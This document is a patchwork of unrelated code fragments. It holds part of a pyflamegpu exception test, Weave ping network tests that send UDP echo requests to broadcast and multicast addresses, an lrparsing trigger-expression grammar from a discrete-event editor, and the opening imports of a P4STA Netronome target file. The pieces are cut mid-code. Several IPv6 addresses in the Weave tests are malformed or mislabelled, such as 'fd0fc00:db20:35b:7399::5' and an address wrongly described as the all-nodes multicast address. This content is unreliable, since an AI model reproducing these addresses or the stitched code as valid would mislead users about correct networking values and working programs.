FLAMEGPU.environment.setPropertyFloat("uint64_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayFloat("uint64_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
# Exceptions Length
class exception_property_length_float(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayFloat("float_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayFloat("float_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayFloat("float_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_double(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayDouble("double_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayDouble("double_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayDouble("double_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_int8(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayInt8("int8_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayInt8("int8_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayInt8("int8_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_uint8(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayUInt8("uint8_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayUInt8("uint8_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt8("uint8_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_int16(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayInt16("int16_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayInt16("int16_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayInt16("int16_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_uint16(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayUInt16("uint16_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayUInt16("uint16_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt16("uint16_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_int32(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayInt32("int32_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayInt32("int32_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayInt32("int32_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_uint32(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayUInt32("uint32_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayUInt32("uint32_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt32("uint32_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_int64(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayInt64("int64_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayInt64("int64_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayInt64("int64_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_uint64(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] | |
test_broadcast_ipv4(self):
'''Send UDP Echo requests to IPv4 broadcast address (255.255.255.255).'''
# Start listening servers on nodes 2 and 4.
self.startWeavePing('node2', '--node-id 2 --fabric-id 1 --subnet 1 --listen')
self.startWeavePing('node4', '--node-id 4 --fabric-id 1 --subnet 1 --listen')
time.sleep(0.25)
# Send 5 broadcast Echo requests from node1 to the IPv4 broadcast address.
self.startWeavePing('node1', '--node-id 1 --fabric-id 1 --subnet 1 --udp --count 5 --interval 200 --dest-addr 255.255.255.255 FFFFFFFFFFFFFFFF')
self.waitComplete('node1')
# Wait for things to settle.
time.sleep(0.25)
# Stop the listening servers.
self.stopProcess('node2')
self.stopProcess('node4')
# Verify the Echo request was received by node2 and node4 with the correct source address.
self.assertTrue('Echo Request from node 1 (192.168.1.1)' in self.getOutput('node2'), msg='Echo request not found (node2)')
self.assertTrue('Echo Request from node 1 (192.168.2.1)' in self.getOutput('node4'), msg='Echo request not found (node4)')
# Verify that an Echo response was received by node1 from at least one of the two server nodes.
node1Output = self.getOutput('node1')
self.assertTrue(('Echo Response from node 2 (192.168.1.2)' in node1Output or 'Echo Response from node 4 (192.168.2.4)' in node1Output),
msg='Echo Response not found (node1)')
def test_intf_multicast_ll(self):
'''Send UDP Echo requests to IPv6 all-nodes multicast address (fffc00:db20:35b:7399::5) on a specific interface. Use sender's link-local address as source address.'''
# Start listening servers on nodes 2 and 3.
self.startWeavePing('node2', '--node-id 2 --fabric-id 1 --subnet 1 --listen')
self.startWeavePing('node3', '--node-id 3 --fabric-id 1 --subnet 1 --listen')
time.sleep(0.25)
# Send 5 multicast Echo requests from node1 over wlan2 (net3).
self.startWeavePing('node1', '--node-id 1 --fabric-id 0 --subnet 1 --udp --count 5 --interval 200 --dest-addr fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b%wlan2 FFFFFFFFFFFFFFFF')
self.waitComplete('node1')
# Wait for things to settle.
time.sleep(0.25)
# Stop the listening servers.
self.stopProcess('node2')
self.stopProcess('node3')
# Verify the Echo request was received by node3 with the correct source address.
self.assertTrue('Echo Request from node 1 (fe80::3:1)' in self.getOutput('node3'), msg='Echo request not found (node3)')
# Verify the Echo response was received by node1 with the correct source address.
self.assertTrue('Echo Response from node 3 (fe80::3:3)' in self.getOutput('node1'), msg='Echo response not found (node1)')
# Verify no Echo request was received by node2.
self.assertFalse('Echo Request from node 1' in self.getOutput('node2'), msg='Unexpected echo request found (node2)')
def test_intf_multicast_ula(self):
'''Send UDP Echo requests to IPv6 all-nodes multicast address (fffc00:db20:35b:7399::5) on a specific interface. Use sender's ULA as source address.'''
# Start listening servers on nodes 2 and 3.
self.startWeavePing('node2', '--node-id 2 --fabric-id 1 --subnet 1 --listen')
self.startWeavePing('node3', '--node-id 3 --fabric-id 1 --subnet 1 --listen')
time.sleep(0.25)
# Send 5 multicast Echo requests from node1 over wlan2 (net3).
self.startWeavePing('node1', '--node-id 1 --fabric-id 1 --subnet 1 --udp --count 5 --interval 200 --dest-addr fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b%wlan2 FFFFFFFFFFFFFFFF')
self.waitComplete('node1')
# Wait for things to settle.
time.sleep(0.25)
# Stop the listening servers.
self.stopProcess('node2')
self.stopProcess('node3')
# Verify the Echo request was received by node3 with the correct source address.
self.assertTrue('Echo Request from node 1 (fd0fc00:db20:35b:7399::5)' in self.getOutput('node3'), msg='Echo request not found (node3)')
# Verify the Echo response was received by node1 with the correct source address.
self.assertTrue('Echo Response from node 3 (fd00:0:1:3::3)' in self.getOutput('node1'), msg='Echo response not found (node1)')
# Verify no Echo request was received by node2.
self.assertFalse('Echo Request from node 1' in self.getOutput('node2'), msg='Unexpected echo request found (node2)')
def test_intf_broadcast_ipv4(self):
'''Send UDP Echo requests to IPv4 broadcast address (255.255.255.255) over a specific interface.'''
# Start listening servers on nodes 2 and 3.
self.startWeavePing('node2', '--node-id 2 --fabric-id 1 --subnet 1 --listen')
self.startWeavePing('node4', '--node-id 4 --fabric-id 1 --subnet 1 --listen')
time.sleep(0.25)
# Send 5 multicast Echo requests from node1 over wlan1 (net2).
self.startWeavePing('node1', '--node-id 1 --fabric-id 1 --subnet 1 --udp --count 5 --interval 200 --dest-addr 255.255.255.255%wlan1 FFFFFFFFFFFFFFFF')
self.waitComplete('node1')
# Wait for things to settle.
time.sleep(0.25)
# Stop the listening servers.
self.stopProcess('node2')
self.stopProcess('node4')
# Verify the Echo request was received by node4 with the correct source address.
self.assertTrue('Echo Request from node 1 (192.168.2.1)' in self.getOutput('node4'), msg='Echo request not found (node4)')
# Verify the Echo response was received by node1 with the correct source address.
self.assertTrue('Echo Response from node 4 (192.168.2.4)' in self.getOutput('node1'), msg='Echo response not found (node1)')
# Verify no Echo request was received by node2.
self.assertFalse('Echo Request from node 1' in self.getOutput('node2'), msg='Unexpected echo request found (node2)')
def test_sender_bound_ipv6_multicast(self):
'''Send UDP Echo requests to IPv6 all-nodes multicast address (fffc00:db20:35b:7399::5) with sender bound to IPv6 listening address.'''
# Start listening servers on nodes 2 and 3.
self.startWeavePing('node2', '--node-id 2 --fabric-id 1 --subnet 1 --listen')
self.startWeavePing('node3', '--node-id 3 --fabric-id 1 --subnet 1 --listen')
time.sleep(0.25)
# Send 5 multicast Echo requests from node1 with sender bound to its wlan2 (net3) IPv6 ULA address.
self.startWeavePing('node1', '--node-id 1 --fabric-id 0 --subnet 1 --udp --count 5 --interval 200 --node-addr fd00:0:1:3::1 --dest-addr fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b FFFFFFFFFFFFFFFF')
self.waitComplete('node1')
# Wait for things to settle.
time.sleep(0.25)
# Stop the listening servers.
self.stopProcess('node2')
self.stopProcess('node3')
# Verify the Echo request was received by node3 with the correct source address.
self.assertTrue('Echo Request from node 1 (fdfc00:db20:35b:7399::5)' in self.getOutput('node3'), msg='Echo request not found (node3)')
# Verify the Echo response was received by node1 with the correct source address.
self.assertTrue('Echo Response from node 3 (fd0fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b)' in self.getOutput('node1'), msg='Echo response not found (node1)')
# Verify no Echo request was received by node2.
self.assertFalse('Echo Request from node 1' in self.getOutput('node2'), msg='Unexpected echo request found (node2)')
def test_sender_bound_ipv4_broadcast(self):
'''Send UDP Echo requests to IPv4 broadcast address (255.255.255.255) with sender bound to IPv4 listening address.'''
# Start listening servers on nodes 2 and 3.
self.startWeavePing('node2', '--node-id 2 --fabric-id 1 --subnet 1 --listen')
self.startWeavePing('node4', '--node-id 4 --fabric-id 1 --subnet 1 --listen')
time.sleep(0.25)
# Send 5 multicast Echo requests from node1 with sender bound to its wlan2 (net3) IPv4 address.
self.startWeavePing('node1', '--node-id 1 --fabric-id 1 --subnet 1 --udp --count 5 --interval 200 --node-addr 192.168.2.1 --dest-addr 255.255.255.255 FFFFFFFFFFFFFFFF')
self.waitComplete('node1')
# Wait for things to settle.
time.sleep(0.25)
# Stop the listening servers.
self.stopProcess('node2')
self.stopProcess('node4')
# Verify the Echo request was received by node4 with the correct source address.
self.assertTrue('Echo Request from node 1 (192.168.2.1)' in self.getOutput('node4'), msg='Echo request not found (node4)')
# Verify the Echo response was received by node1 with the correct source address.
self.assertTrue('Echo Response from node 4 (192.168.2.4)' in self.getOutput('node1'), msg='Echo response not found (node1)')
# Verify no Echo request was received by node2.
self.assertFalse('Echo Request from node 1' in self.getOutput('node2'), msg='Unexpected echo request found (node2)')
def test_listener_bound_multicast_ll(self):
'''Send UDP Echo requests to IPv6 all-nodes multicast address (fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b) with listeners bound to IPv6 addresses. Use sender's link-local as source address.'''
# Start listening servers on nodes 2 and 3 bound to their respective ULAs.
self.startWeavePing('node2', '--node-id 2 --fabric-id 1 --subnet 1 --node-addr fdfc00:db20:35b:7399::5 --listen')
self.startWeavePing('node3', '--node-id 3 --fabric-id 1 --subnet 1 --node-addr fdfc00:db20:35b:7399::5 --listen')
time.sleep(0.25)
# Send 5 multicast Echo requests from node1 to the IPv6 all-nodes, link-scope address (fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b).
# Force the source address of the requests to be node1's link-local address by configuring it
# to NOT be a member of a fabric (i.e. fabric id = 0).
self.startWeavePing('node1', '--node-id 1 --fabric-id 0 --subnet 1 --udp --count 5 --interval 200 --dest-addr fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b FFFFFFFFFFFFFFFF')
self.waitComplete('node1')
# Wait for things to settle.
time.sleep(0.25)
# Stop the listening servers.
self.stopProcess('node2')
self.stopProcess('node3')
# Verify the Echo request was received by node2 and node3 with the correct source address.
self.assertTrue('Echo Request from node 1 (fe80::1:1)' in self.getOutput('node2'), msg='Echo request not found (node2)')
self.assertTrue('Echo Request from node 1 (fe80::3:1)' in self.getOutput('node3'), msg='Echo request not found (node3)')
# Verify that an Echo response was received by node1 from at least one of the two server nodes.
# Note that, because the listeners are bound to specific IPv6 ULAs, the responses come from those ULAs, rather than
# from the node's link-local addresses as would be expected if the node's weren't bound.
node1Output = self.getOutput('node1')
self.assertTrue(('Echo Response from node 2 (fd0fdf8:f53e:61e4::18)' in node1Output or 'Echo Response from node 3 (fd0fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b)' in node1Output),
msg='Echo Response not found (node1)')
| |
<reponame>mouton5000/DiscreteEventApplicationEditor
import lrparsing
from lrparsing import Keyword, List, Prio, Ref, Token, Opt
from arithmeticExpressions import ALitteral, Addition, Subtraction, Product, Division, EuclideanDivision, Modulo, \
Power, Func, UndefinedLitteral, Min, Max, globalsHeightExpression, globalsWidthExpression, globalsFpsExpression
from triggerExpressions import BLitteral, Timer, eLock, \
Equals, GreaterThan, LowerThan, GeqThan, LeqThan, \
NotEquals, And, Or, Not, Is, AnyEval, RandomEval, Del, \
SelectMinEval, SelectMaxEval, UniqueEval, PropertyTriggerExpression, \
EventTriggerExpression, SpriteTriggerExpression, TextTriggerExpression, \
LineTriggerExpression, OvalTriggerExpression, RectTriggerExpression, PolygonTriggerExpression
from database import Variable
from keywords import KEYWORD_ID, KEYWORD_FILENAME, KEYWORD_COLOR, KEYWORD_FONT_NAME, KEYWORD_FONT_SIZE, KEYWORD_H, \
KEYWORD_TEXT, KEYWORD_WIDTH, KEYWORD_W, KEYWORD_X_INT, KEYWORD_X, KEYWORD_Y_INT, KEYWORD_Y, KEYWORD_Z, \
KEYWORD_ROTATE, KEYWORD_SCALE
from utils.mathutils import sign
from random import random, randint
from math import cos, sin, tan, exp, log, floor, ceil, acos, asin, atan, cosh, sinh, tanh, acosh, atanh, asinh
class TriggerParser(lrparsing.Grammar):
class T(lrparsing.TokenRegistry):
integer = Token(re='[0-9]+')
float = Token(re='[0-9]+\.[0-9]+')
string = Token(re='\'[^\']*\'')
true = Token('true')
false = Token('false')
variable = Token(re='[A-Z][A-Z_0-9]*')
uvariable = Token('_')
prop = Token(re='p[A-Z][A-Za-z_0-9]*')
event = Token(re='e[A-Z][A-Za-z_0-9]*')
graphicsSprite = Token(re='gs[A-Z][A-Za-z_0-9]*')
graphicsLine = Token(re='gl[A-Z][A-Za-z_0-9]*')
graphicsOval = Token(re='go[A-Z][A-Za-z_0-9]*')
graphicsRect = Token(re='gr[A-Z][A-Za-z_0-9]*')
graphicsPolygon = Token(re='gp[A-Z][A-Za-z_0-9]*')
graphicsText = Token(re='gt[A-Z][A-Za-z_0-9]*')
idkw = Token('id')
coordX = Token('x')
coordY = Token('y')
coordZ = Token('z')
coordXInt = Token(re='x[1-9][0-9]*')
coordYInt = Token(re='y[1-9][0-9]*')
coordW = Token('w')
coordH = Token('h')
rotate = Token('rotate')
scale = Token('scale')
fileName = Token('fileName')
color = Token('color')
width = Token('width')
text = Token('text')
fontName = Token('fontName')
fontSize = Token('fontSize')
cosf = Token('cos')
sinf = Token('sin')
tanf = Token('tan')
expf = Token('exp')
logf = Token('log')
absf = Token('abs')
signf = Token('sign')
floorf = Token('floor')
ceilf = Token('ceil')
roundf = Token('round')
acosf = Token('acos')
asinf = Token('asin')
atanf = Token('atan')
chf = Token('ch')
shf = Token('sh')
thf = Token('th')
achf = Token('ach')
ashf = Token('ash')
athf = Token('ath')
rand = Token('rand')
randint = Token('randint')
lenf = Token('len')
minf = Token('min')
maxf = Token('max')
globalsKw = Token('globals')
globalsFpsKw = Token('fps')
globalsHeightKw = Token('screenHeight')
globalsWidthKw = Token('screenWidth')
elock = Keyword('eLock')
timer = Token('timer')
iskw = Token('is')
delkw = Token('del')
andkw = Token('and')
orkw = Token('or')
notkw = Token('not')
anyEval = Token('anyEval')
randomEval = Token('randomEval')
minEvalKw = Token('minEval')
maxEvalKw = Token('maxEval')
uniqueEval = Token('uniqueEval')
arithmExpr = Ref('arithmExpr')
boolExpr = Ref('boolExpr')
litExpr = T.true | T.false
timerExpr = T.timer + '(' + arithmExpr + ')'
eLockParameters = List(arithmExpr, Token(','), min=1)
eLockExpr = T.elock + '(' + arithmExpr + Opt(',' + eLockParameters) + ')'
parameter = Prio(T.variable, arithmExpr) | T.uvariable
namedParameterKW = arithmExpr | T.idkw | \
T.coordX | T.coordY | T.coordZ | \
T.coordXInt | T.coordYInt | \
T.coordH | T.coordW | \
T.rotate | T.scale | \
T.fileName | \
T.color | T.width | \
T.text | T.fontName | T.fontSize
namedParameter = namedParameterKW + '=' + parameter
parameters = \
Prio(List(parameter, Token(',')) + Opt(',' + List(namedParameter, Token(','))),
List(namedParameter, Token(',')))
parameterizedType = T.prop | T.event | T.graphicsSprite | T.graphicsText | T.graphicsLine | \
T.graphicsOval | T.graphicsRect | T.graphicsPolygon
parameterizedExpr = parameterizedType + '(' + parameters + ')'
compareArithmExpr = arithmExpr << (Token('==') | Token('>') | Token('<') | Token('<=') |
Token('>=') | Token('!=')) << arithmExpr
andExpr = boolExpr >> T.andkw >> boolExpr
orExpr = boolExpr >> T.orkw >> boolExpr
notExpr = T.notkw + boolExpr
isExpr = T.variable + T.iskw + arithmExpr
delExpr = T.delkw + T.variable
parExpr = '(' + boolExpr + ')'
anyEvalExpr = T.anyEval + parExpr
randomEvalExpr = T.randomEval + parExpr
minEvalExpr = T.minEvalKw + '[' + arithmExpr + ']' + parExpr
maxEvalExpr = T.maxEvalKw + '[' + arithmExpr + ']' + parExpr
uniqueEvalExpr = T.uniqueEval + parExpr
boolExpr = Prio(litExpr,
timerExpr,
eLockExpr,
parameterizedExpr,
parExpr,
isExpr,
delExpr,
compareArithmExpr,
notExpr,
andExpr,
orExpr,
anyEvalExpr,
randomEvalExpr,
minEvalExpr,
maxEvalExpr,
uniqueEvalExpr
)
addArithmExpr = arithmExpr << Token('+') << arithmExpr
minusArithmExpr = Opt(arithmExpr) << Token('-') << arithmExpr
multArithmExpr = arithmExpr << (Token('*') | Token('/') | Token('//') | Token('%')) << arithmExpr
powerArithmExpr = arithmExpr << Token('**') << arithmExpr
constantArithmExpr = Token('pi') | Token('e')
parArithmExpr = '(' + arithmExpr + ')'
unaryFuncArithmExpr = (T.cosf | T.sinf | T.tanf | T.expf | T.logf | T.absf | T.signf | T.floorf | T.ceilf | T.roundf
| T.acosf | T.asinf | T.atanf | T.shf | T.chf | T.thf | T.ashf | T.achf | T.athf | T.lenf
| T.rand | T.randint) \
+ parArithmExpr
binaryFuncArithmExpr = (T.minf | T.maxf) + '(' + arithmExpr + ',' + arithmExpr + ')'
globalsKeyWord = T.globalsFpsKw | T.globalsHeightKw | T.globalsWidthKw
globalsExpr = T.globalsKw + '(' + globalsKeyWord + ')'
arithmExpr = Prio(T.integer, T.float, T.variable, T.string, constantArithmExpr,
globalsExpr, parArithmExpr,
unaryFuncArithmExpr, binaryFuncArithmExpr,
powerArithmExpr, multArithmExpr, minusArithmExpr, addArithmExpr)
START = boolExpr
COMMENTS = ( # Allow C and Python comments
Token(re="#(?:[^\r\n]*(?:\r\n?|\n\r?))") |
Token(re="/[*](?:[^*]|[*][^/])*[*]/"))
@classmethod
def parse(cls, expr, tree_factory=None, on_error=None, log=None):
tree = super(TriggerParser, cls).parse(expr, tree_factory, on_error, log)
return cls.buildExpression(tree)
@classmethod
def buildExpression(cls, tree):
rootName = tree[0]
def buildAnd():
a1 = cls.buildExpression((tree[1]))
a2 = cls.buildExpression((tree[3]))
return And(a1, a2)
def buildAnyEval():
expr = cls.buildExpression(tree[2])
return AnyEval(expr)
def buildArithmetic():
return cls.buildArithmeticExpression(tree)
def buildCompare():
a1 = cls.buildExpression(tree[1])
a2 = cls.buildExpression(tree[3])
if tree[2][1] == '==':
return Equals(a1, a2)
elif tree[2][1] == '>':
return GreaterThan(a1, a2)
elif tree[2][1] == '<':
return LowerThan(a1, a2)
elif tree[2][1] == '>=':
return GeqThan(a1, a2)
elif tree[2][1] == '<=':
return LeqThan(a1, a2)
elif tree[2][1] == '!=':
return NotEquals(a1, a2)
def buildDel():
variable = cls.buildExpression(tree[2])
return Del(variable)
def buildDoubleNext():
return cls.buildExpression(tree[2])
def buildElock():
priority = cls.buildExpression(tree[3])
if len(tree) >= 6:
args = cls.buildExpression(tree[5])
else:
args = []
return eLock(priority, args)
def buildELockParameters():
return [cls.buildExpression(arg) for arg in tree[1::2]]
def buildIs():
variable = cls.buildExpression(tree[1])
function = cls.buildExpression(tree[3])
return Is(variable, function)
def buildLitteral():
return BLitteral(tree[1][1] == 'true')
def buildMaxEvalExpr():
arithmExpr = cls.buildExpression(tree[3])
expr = cls.buildExpression(tree[5])
return SelectMaxEval(expr, arithmExpr)
def buildMinEvalExpr():
arithmExpr = cls.buildExpression(tree[3])
expr = cls.buildExpression(tree[5])
return SelectMinEval(expr, arithmExpr)
def buildNamedParameter():
name = cls.buildExpression(tree[1])
parameter = cls.buildExpression(tree[3])
return name, parameter
def buildNext():
return cls.buildExpression(tree[1])
def buildNot():
a1 = cls.buildExpression((tree[2]))
return Not(a1)
def buildOr():
a1 = cls.buildExpression((tree[1]))
a2 = cls.buildExpression((tree[3]))
return Or(a1, a2)
def buildParameterized():
exprType, exprValue = cls.buildExpression(tree[1])
exprTypeAction = {
TriggerParser.T.prop: (PropertyTriggerExpression, 1),
TriggerParser.T.event: (EventTriggerExpression, 1),
TriggerParser.T.graphicsSprite: (SpriteTriggerExpression, 2),
TriggerParser.T.graphicsLine: (LineTriggerExpression, 2),
TriggerParser.T.graphicsOval: (OvalTriggerExpression, 2),
TriggerParser.T.graphicsRect: (RectTriggerExpression, 2),
TriggerParser.T.graphicsPolygon: (PolygonTriggerExpression, 2),
TriggerParser.T.graphicsText: (TextTriggerExpression, 2)
}
clsCons, offset = exprTypeAction[exprType]
args, kwargs = cls.buildExpression(tree[3])
if offset > 0:
name = exprValue[offset:]
return clsCons(name, args, kwargs)
else:
return clsCons(args, kwargs)
def buildParameterizedType():
return tree[1][0], tree[1][1]
def buildParameters():
buildArgs = [cls.buildExpression(arg) for arg in tree[1::2]]
args = [arg for arg in buildArgs if not isinstance(arg, tuple)]
kwargs = {kwarg[0]: kwarg[1] for kwarg in buildArgs if isinstance(kwarg, tuple)}
return args, kwargs
def buildRandomEval():
expr = cls.buildExpression(tree[2])
return RandomEval(expr)
def buildTimer():
nbFrames = cls.buildExpression((tree[3]))
return Timer(nbFrames)
def buildUniqueEvalExpr():
expr = cls.buildExpression(tree[2])
return UniqueEval(expr)
def keywordColorValue():
return KEYWORD_COLOR
def keywordFileNameValue():
return KEYWORD_FILENAME
def keywordFontNameValue():
return KEYWORD_FONT_NAME
def keywordFontSizeValue():
return KEYWORD_FONT_SIZE
def keywordHValue():
return KEYWORD_H
def keywordIdValue():
return KEYWORD_ID
def keywordRotateValue():
return KEYWORD_ROTATE
def keywordScaleValue():
return KEYWORD_SCALE
def keywordTextValue():
return KEYWORD_TEXT
def keywordWidthValue():
return KEYWORD_WIDTH
def keywordWValue():
return KEYWORD_W
def keywordXIntValue():
value = int(tree[1][1:])
return KEYWORD_X_INT[value]
def keywordXValue():
return KEYWORD_X
def keywordYIntValue():
value = int(tree[1][1:])
return KEYWORD_Y_INT[value]
def keywordYValue():
return KEYWORD_Y
def keywordZValue():
return KEYWORD_Z
def unnamedVariableValue():
return UndefinedLitteral()
def value():
return tree[1]
def variableValue():
return Variable(tree[1])
booleanSymbols = {
TriggerParser.T.variable: variableValue,
TriggerParser.T.uvariable: unnamedVariableValue,
TriggerParser.T.idkw: keywordIdValue,
TriggerParser.T.coordX: keywordXValue,
TriggerParser.T.coordY: keywordYValue,
TriggerParser.T.coordZ: keywordZValue,
TriggerParser.T.coordXInt: keywordXIntValue,
TriggerParser.T.coordYInt: keywordYIntValue,
TriggerParser.T.coordW: keywordWValue,
TriggerParser.T.coordH: keywordHValue,
TriggerParser.T.rotate: keywordRotateValue,
TriggerParser.T.scale: keywordScaleValue,
TriggerParser.T.fileName: keywordFileNameValue,
TriggerParser.T.color: keywordColorValue,
TriggerParser.T.width: keywordWidthValue,
TriggerParser.T.text: keywordTextValue,
TriggerParser.T.fontName: keywordFontNameValue,
TriggerParser.T.fontSize: keywordFontSizeValue,
TriggerParser.arithmExpr: buildArithmetic,
TriggerParser.boolExpr: buildNext,
TriggerParser.litExpr: buildLitteral,
TriggerParser.timerExpr: buildTimer,
TriggerParser.eLockParameters: buildELockParameters,
TriggerParser.eLockExpr: buildElock,
TriggerParser.parameter: buildNext,
TriggerParser.namedParameterKW: buildNext,
TriggerParser.namedParameter: buildNamedParameter,
TriggerParser.parameters: buildParameters,
TriggerParser.parameterizedType: buildParameterizedType,
TriggerParser.parameterizedExpr: buildParameterized,
TriggerParser.compareArithmExpr: buildCompare,
TriggerParser.andExpr: buildAnd,
TriggerParser.orExpr: buildOr,
TriggerParser.notExpr: buildNot,
TriggerParser.isExpr: buildIs,
TriggerParser.delExpr: buildDel,
TriggerParser.parExpr: buildDoubleNext,
TriggerParser.anyEvalExpr: buildAnyEval,
TriggerParser.randomEvalExpr: buildRandomEval,
TriggerParser.minEvalExpr: buildMinEvalExpr,
TriggerParser.maxEvalExpr: buildMaxEvalExpr,
TriggerParser.uniqueEvalExpr: buildUniqueEvalExpr,
TriggerParser.parArithmExpr: buildArithmetic,
TriggerParser.START: buildNext,
}
return booleanSymbols[rootName]()
@classmethod
def buildArithmeticExpression(cls, tree):
rootName = tree[0]
def buildBinaryExpression():
a1 = cls.buildArithmeticExpression(tree[1])
a3 = cls.buildArithmeticExpression(tree[3])
if tree[2][1] == '+':
return Addition(a1, a3)
elif tree[2][1] == '-':
return Subtraction(a1, a3)
elif tree[2][1] == '*':
return Product(a1, a3)
elif tree[2][1] == '/':
return Division(a1, a3)
elif tree[2][1] == '//':
return EuclideanDivision(a1, a3)
elif tree[2][1] == '%':
return Modulo(a1, a3)
elif | |
<reponame>fridolinsiegmund/P4STA<filename>stamper_targets/netronome/netronome.py
# Copyright 2020-present <NAME>, <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import struct
import time
import traceback
from abstract_target import AbstractTarget
import P4STA_utils
from thrift import Thrift
from thrift.transport import TSocket, TTransport, TZlibTransport
from thrift.protocol import TBinaryProtocol
